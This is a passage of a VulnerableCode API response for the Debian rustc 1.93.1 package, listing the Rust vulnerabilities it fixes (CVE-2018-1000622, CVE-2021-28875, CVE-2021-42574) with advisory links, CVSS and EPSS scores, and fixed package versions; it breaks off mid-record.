Package Instance
Lookup for vulnerable packages by Package URL.
GET /api/packages/1059655?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/1059655?format=api", "purl": "pkg:deb/debian/rustc@1.93.1%2Bdfsg1-2?distro=trixie", "type": "deb", "namespace": "debian", "name": "rustc", "version": "1.93.1+dfsg1-2", "qualifiers": { "distro": "trixie" }, "subpath": "", "is_vulnerable": false, "next_non_vulnerable_version": "1.94.1+dfsg1-1", "latest_non_vulnerable_version": "1.94.1+dfsg1-1", "affected_by_vulnerabilities": [], "fixing_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/56586?format=api", "vulnerability_id": "VCID-14pa-2rzz-kfg7", "summary": "Multiple vulnerabilities have been found in Rust, the worst which\n may allow local attackers to execute arbitrary code.", "references": [ { "reference_url": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00076.html", "reference_id": "", "reference_type": "", "scores": [], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00076.html" }, { "reference_url": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00006.html", "reference_id": "", "reference_type": "", "scores": [], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00006.html" }, { "reference_url": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00031.html", "reference_id": "", "reference_type": "", "scores": [], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00031.html" }, { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-1000622.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-1000622.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2018-1000622", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00801", "scoring_system": "epss", "scoring_elements": "0.74017", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00801", "scoring_system": "epss", "scoring_elements": "0.74147", "published_at": "2026-04-29T12:55:00Z" }, { "value": "0.00801", "scoring_system": "epss", "scoring_elements": "0.74104", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00801", "scoring_system": "epss", "scoring_elements": "0.7414", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00801", "scoring_system": "epss", "scoring_elements": "0.74148", "published_at": "2026-04-26T12:55:00Z" }, { "value": "0.00801", "scoring_system": "epss", "scoring_elements": "0.74024", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00801", "scoring_system": "epss", "scoring_elements": "0.7405", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00801", "scoring_system": "epss", "scoring_elements": "0.74021", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00801", "scoring_system": "epss", "scoring_elements": "0.74054", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00801", "scoring_system": "epss", "scoring_elements": "0.74069", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00801", "scoring_system": "epss", "scoring_elements": "0.74091", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00801", "scoring_system": "epss", "scoring_elements": "0.74072", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00801", "scoring_system": "epss", "scoring_elements": "0.74065", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00801", "scoring_system": "epss", "scoring_elements": "0.74105", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00801", "scoring_system": "epss", "scoring_elements": "0.74113", "published_at": "2026-04-18T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2018-1000622" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000622", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000622" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://groups.google.com/forum/#%21topic/rustlang-security-announcements/4ybxYLTtXuM", "reference_id": "", "reference_type": "", "scores": [], "url": "https://groups.google.com/forum/#%21topic/rustlang-security-announcements/4ybxYLTtXuM" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1597063", "reference_id": "1597063", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1597063" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:rust-lang:rust:*:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:a:rust-lang:rust:*:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:rust-lang:rust:*:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000622", "reference_id": "CVE-2018-1000622", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv2", "scoring_elements": "AV:N/AC:M/Au:N/C:P/I:P/A:P" }, { "value": "7.8", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000622" }, { "reference_url": "https://security.gentoo.org/glsa/201812-11", "reference_id": "GLSA-201812-11", "reference_type": "", "scores": [], "url": "https://security.gentoo.org/glsa/201812-11" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/938931?format=api", "purl": "pkg:deb/debian/rustc@1.27.1%2Bdfsg1-1~exp1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.27.1%252Bdfsg1-1~exp1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938927?format=api", "purl": "pkg:deb/debian/rustc@1.48.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4khp-kevq-xff5" }, { "vulnerability": "VCID-69zd-gcvx-fuhr" }, { "vulnerability": "VCID-7ap9-xghv-dbdy" }, { "vulnerability": "VCID-d8yv-ngej-1kf7" }, { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-f4bw-5erp-4uc6" }, { "vulnerability": "VCID-fu46-5dhv-ckdt" }, { "vulnerability": "VCID-j9kg-rd4y-y7by" }, { "vulnerability": "VCID-pbjz-th4w-tqgb" }, { "vulnerability": "VCID-pvm9-wtbx-1ubx" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" }, { "vulnerability": "VCID-wdu6-3vph-aqb7" }, { "vulnerability": "VCID-wpe1-jr23-duhh" }, { "vulnerability": "VCID-y25s-c64z-57a6" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.48.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938925?format=api", "purl": "pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938929?format=api", "purl": "pkg:deb/debian/rustc@1.85.0%2Bdfsg3-1?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.85.0%252Bdfsg3-1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938928?format=api", "purl": "pkg:deb/debian/rustc@1.92.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.92.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1059655?format=api", "purl": "pkg:deb/debian/rustc@1.93.1%2Bdfsg1-2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.93.1%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1067629?format=api", "purl": "pkg:deb/debian/rustc@1.94.1%2Bdfsg1-1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.94.1%252Bdfsg1-1%3Fdistro=trixie" } ], "aliases": [ "CVE-2018-1000622" ], "risk_score": 3.5, "exploitability": "0.5", "weighted_severity": "7.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-14pa-2rzz-kfg7" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/31468?format=api", "vulnerability_id": "VCID-4khp-kevq-xff5", "summary": "Multiple vulnerabilities have been discovered in Rust, the worst of which could result in denial of service.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-28875.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-28875.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-28875", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00416", "scoring_system": "epss", "scoring_elements": "0.61571", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00416", "scoring_system": "epss", "scoring_elements": "0.61733", "published_at": "2026-04-29T12:55:00Z" }, { "value": "0.00416", "scoring_system": "epss", "scoring_elements": "0.61724", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00416", "scoring_system": "epss", "scoring_elements": "0.61741", "published_at": "2026-04-26T12:55:00Z" }, { "value": "0.00416", "scoring_system": "epss", "scoring_elements": "0.61645", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00416", "scoring_system": "epss", "scoring_elements": "0.61676", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00416", "scoring_system": "epss", "scoring_elements": "0.61647", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00416", "scoring_system": "epss", "scoring_elements": "0.61695", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00416", "scoring_system": "epss", "scoring_elements": "0.61711", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00416", "scoring_system": "epss", "scoring_elements": "0.61732", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00416", "scoring_system": "epss", "scoring_elements": "0.6172", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00416", "scoring_system": "epss", "scoring_elements": "0.617", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00416", "scoring_system": "epss", "scoring_elements": "0.61742", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00416", "scoring_system": "epss", "scoring_elements": "0.61747", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00416", "scoring_system": "epss", "scoring_elements": "0.6173", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-28875" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28875", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28875" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1949194", "reference_id": "1949194", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1949194" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=986803", "reference_id": "986803", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=986803" }, { "reference_url": "https://security.archlinux.org/AVG-1803", "reference_id": "AVG-1803", "reference_type": "", "scores": [ { "value": "Medium", "scoring_system": "archlinux", "scoring_elements": "" } ], "url": "https://security.archlinux.org/AVG-1803" }, { "reference_url": "https://security.gentoo.org/glsa/202210-09", "reference_id": "GLSA-202210-09", "reference_type": "", "scores": [], "url": "https://security.gentoo.org/glsa/202210-09" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:3042", "reference_id": "RHSA-2021:3042", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:3042" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:3063", "reference_id": "RHSA-2021:3063", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:3063" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/938936?format=api", "purl": "pkg:deb/debian/rustc@1.53.0%2Bdfsg1-1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.53.0%252Bdfsg1-1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938925?format=api", "purl": "pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938929?format=api", "purl": "pkg:deb/debian/rustc@1.85.0%2Bdfsg3-1?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.85.0%252Bdfsg3-1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938928?format=api", "purl": "pkg:deb/debian/rustc@1.92.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.92.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1059655?format=api", "purl": "pkg:deb/debian/rustc@1.93.1%2Bdfsg1-2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.93.1%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1067629?format=api", "purl": "pkg:deb/debian/rustc@1.94.1%2Bdfsg1-1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.94.1%252Bdfsg1-1%3Fdistro=trixie" } ], "aliases": [ "CVE-2021-28875" ], "risk_score": 3.4, "exploitability": "0.5", "weighted_severity": "6.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-4khp-kevq-xff5" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/31477?format=api", "vulnerability_id": "VCID-69zd-gcvx-fuhr", "summary": "Multiple vulnerabilities have been discovered in Rust, the worst of which could result in denial of service.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-42574.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-42574.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-42574", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.24988", "scoring_system": "epss", "scoring_elements": "0.96175", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.24988", "scoring_system": "epss", "scoring_elements": "0.96167", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.24988", "scoring_system": "epss", "scoring_elements": "0.96165", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.24988", "scoring_system": "epss", "scoring_elements": "0.9618", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.25471", "scoring_system": "epss", "scoring_elements": "0.96236", "published_at": "2026-04-29T12:55:00Z" }, { "value": "0.25471", "scoring_system": "epss", "scoring_elements": "0.96181", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.25471", "scoring_system": "epss", "scoring_elements": "0.96189", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.25471", "scoring_system": "epss", "scoring_elements": "0.96197", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.25471", "scoring_system": "epss", "scoring_elements": "0.962", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.25471", "scoring_system": "epss", "scoring_elements": "0.9621", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.25471", "scoring_system": "epss", "scoring_elements": "0.96213", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.25471", "scoring_system": "epss", "scoring_elements": "0.96232", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.25471", "scoring_system": "epss", "scoring_elements": "0.96233", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.25471", "scoring_system": "epss", "scoring_elements": "0.96234", "published_at": "2026-04-26T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-42574" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42574", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42574" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "http://www.openwall.com/lists/oss-security/2021/11/01/1", "reference_id": "1", "reference_type": "", "scores": [ { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/" } ], "url": "http://www.openwall.com/lists/oss-security/2021/11/01/1" }, { "reference_url": "http://www.openwall.com/lists/oss-security/2021/11/02/10", "reference_id": "10", "reference_type": "", "scores": [ { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/" } ], "url": "http://www.openwall.com/lists/oss-security/2021/11/02/10" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2005819", "reference_id": "2005819", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2005819" }, { "reference_url": "http://www.openwall.com/lists/oss-security/2021/11/01/4", "reference_id": "4", "reference_type": "", "scores": [ { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/" } ], "url": "http://www.openwall.com/lists/oss-security/2021/11/01/4" }, { "reference_url": "http://www.openwall.com/lists/oss-security/2021/11/01/5", "reference_id": "5", "reference_type": "", "scores": [ { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/" } ], "url": "http://www.openwall.com/lists/oss-security/2021/11/01/5" }, { "reference_url": "http://www.openwall.com/lists/oss-security/2021/11/01/6", "reference_id": "6", "reference_type": "", "scores": [ { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/" } ], "url": "http://www.openwall.com/lists/oss-security/2021/11/01/6" }, { "reference_url": "https://www.kb.cert.org/vuls/id/999008", "reference_id": "999008", "reference_type": "", "scores": [ { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/" } ], "url": "https://www.kb.cert.org/vuls/id/999008" }, { "reference_url": "https://security.archlinux.org/AVG-2506", "reference_id": "AVG-2506", "reference_type": "", "scores": [ { "value": "Medium", "scoring_system": "archlinux", "scoring_elements": "" } ], "url": "https://security.archlinux.org/AVG-2506" }, { "reference_url": "https://security.gentoo.org/glsa/202210-09", "reference_id": "GLSA-202210-09", "reference_type": "", "scores": [ { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/" } ], "url": "https://security.gentoo.org/glsa/202210-09" }, { "reference_url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IH2RG5YTR6ZZOLUV3EUPZEIJR7XHJLVD/", "reference_id": "IH2RG5YTR6ZZOLUV3EUPZEIJR7XHJLVD", "reference_type": "", "scores": [ { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/" } ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IH2RG5YTR6ZZOLUV3EUPZEIJR7XHJLVD/" }, { "reference_url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LQNTFF24ROHLVPLUOEISBN3F7QM27L4U/", "reference_id": "LQNTFF24ROHLVPLUOEISBN3F7QM27L4U", "reference_type": "", "scores": [ { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/" } ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LQNTFF24ROHLVPLUOEISBN3F7QM27L4U/" }, { "reference_url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QUPA37D57VPTDLSXOOGF4UXUEADOC4PQ/", "reference_id": "QUPA37D57VPTDLSXOOGF4UXUEADOC4PQ", "reference_type": "", "scores": [ { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/" } ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QUPA37D57VPTDLSXOOGF4UXUEADOC4PQ/" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4033", "reference_id": "RHSA-2021:4033", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4033" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4034", "reference_id": "RHSA-2021:4034", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4034" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4035", "reference_id": "RHSA-2021:4035", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4035" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4036", "reference_id": "RHSA-2021:4036", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4036" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4037", "reference_id": "RHSA-2021:4037", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4037" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4038", "reference_id": "RHSA-2021:4038", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4038" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4039", "reference_id": "RHSA-2021:4039", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4039" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4585", "reference_id": "RHSA-2021:4585", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4585" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4586", "reference_id": "RHSA-2021:4586", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4586" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4587", "reference_id": "RHSA-2021:4587", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4587" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4588", "reference_id": "RHSA-2021:4588", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4588" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4589", "reference_id": "RHSA-2021:4589", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4589" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4590", "reference_id": "RHSA-2021:4590", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4590" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4591", "reference_id": "RHSA-2021:4591", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4591" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4592", "reference_id": "RHSA-2021:4592", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4592" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4593", "reference_id": "RHSA-2021:4593", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4593" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4594", "reference_id": "RHSA-2021:4594", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4594" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4595", "reference_id": "RHSA-2021:4595", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4595" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4596", "reference_id": "RHSA-2021:4596", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4596" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4598", "reference_id": "RHSA-2021:4598", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4598" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4599", "reference_id": "RHSA-2021:4599", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4599" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4600", "reference_id": "RHSA-2021:4600", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4600" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4601", "reference_id": "RHSA-2021:4601", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4601" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4602", "reference_id": "RHSA-2021:4602", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4602" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4649", "reference_id": "RHSA-2021:4649", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4649" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4669", "reference_id": "RHSA-2021:4669", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4669" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4694", "reference_id": "RHSA-2021:4694", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4694" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4723", "reference_id": "RHSA-2021:4723", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4723" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4724", "reference_id": "RHSA-2021:4724", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4724" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4729", "reference_id": "RHSA-2021:4729", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4729" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4730", "reference_id": "RHSA-2021:4730", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4730" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4743", "reference_id": "RHSA-2021:4743", 